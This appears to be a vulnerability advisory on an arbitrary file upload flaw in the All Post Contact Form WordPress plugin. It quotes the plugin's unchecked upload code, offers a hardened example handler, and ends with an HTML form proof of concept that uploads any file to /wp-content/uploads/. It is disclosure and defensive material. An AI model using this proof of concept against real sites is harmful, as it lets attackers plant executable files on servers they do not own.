Arbitrary File Upload Vulnerability in All Post Contact Form
Through the proactive monitoring of changes in WordPress plugins for serious vulnerabilities that we do, we recently found an arbitrary file upload vulnerability in the All Post Contact Form plugin.
When the plugin's shortcode, rlallpostcontactform, is on a post or page, the file /allpost-contactform-core.php is included. In that file the following code is run:
if(is_uploaded_file($_FILES['attachment_file']['tmp_name'])){
    // The uploaded file is moved into the uploads directory under its original name;
    // neither the file name nor the file type is checked first.
    move_uploaded_file($_FILES['attachment_file']['tmp_name'],WP_CONTENT_DIR.'/uploads/'.$_FILES['attachment_file']['name'] );
}
That code checks whether the request includes a file under the field name “attachment_file” and, if it does, saves the file to the directory /wp-content/uploads/ under the name supplied by the client, with no check of the file's name or type.
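A hardened version of that handler, as an added example that is not the plugin's own code: it assumes it runs inside WordPress (so wp_handle_upload() and wp_verify_nonce() are available) and that the form emits a hypothetical nonce field named apcf_nonce created with wp_nonce_field('apcf_attach', 'apcf_nonce'); the function name and the 2 MB size cap are likewise constructed for the example.

```php
<?php
// Added example, not the plugin's code. Replaces the unconditional
// move_uploaded_file() shown above with a checked upload.
function apcf_example_handle_attachment() {
    if ( empty( $_FILES['attachment_file'] )
        || ! is_uploaded_file( $_FILES['attachment_file']['tmp_name'] ) ) {
        return new WP_Error( 'no_file', 'No uploaded file.' );
    }

    // Require the form's nonce (hypothetical field/action names) so the
    // handler only accepts submissions that came from the rendered form.
    if ( ! isset( $_POST['apcf_nonce'] )
        || ! wp_verify_nonce( $_POST['apcf_nonce'], 'apcf_attach' ) ) {
        return new WP_Error( 'bad_nonce', 'Invalid form token.' );
    }

    // Constructed size cap: refuse anything over 2 MB.
    if ( (int) $_FILES['attachment_file']['size'] > 2 * 1024 * 1024 ) {
        return new WP_Error( 'too_large', 'Attachment exceeds 2 MB.' );
    }

    // Allow-list of attachment types; scripts such as .php are not on it.
    $allowed = array(
        'pdf'      => 'application/pdf',
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
    );

    // Check both the extension and the file's actual content against the list.
    $check = wp_check_filetype_and_ext(
        $_FILES['attachment_file']['tmp_name'],
        $_FILES['attachment_file']['name'],
        $allowed
    );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        return new WP_Error( 'bad_type', 'File type not permitted.' );
    }

    // Let WordPress perform the move: it sanitises the file name, avoids
    // collisions, and applies the same MIME allow-list again.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $overrides = array( 'test_form' => false, 'mimes' => $allowed );
    $result    = wp_handle_upload( $_FILES['attachment_file'], $overrides );

    if ( isset( $result['error'] ) ) {
        return new WP_Error( 'upload_failed', $result['error'] );
    }
    return $result; // array with 'file', 'url' and 'type' on success
}
```

The important difference from the original is that the file name and type are validated before anything is written, and the destination name is chosen by WordPress rather than taken from the request.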
We contacted the developer about the vulnerability a week ago, but have not heard back from them. In line with our disclosure policy, which is based on the need to provide our customers with information on vulnerabilities on a timely basis, we are now disclosing this vulnerability.
Proof of Concept
The following proof of concept will upload the selected file to the directory /wp-content/uploads/.
Make sure to replace “[path to shortcode post]” with the location of the post (or page) with the shortcode “rlallpostcontactform”.
<html>
<body>
<form action="[path to shortcode post]" method="POST" enctype="multipart/form-data">
<input type="file" name="attachment_file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Timeline
- September 13, 2017 – Developer notified.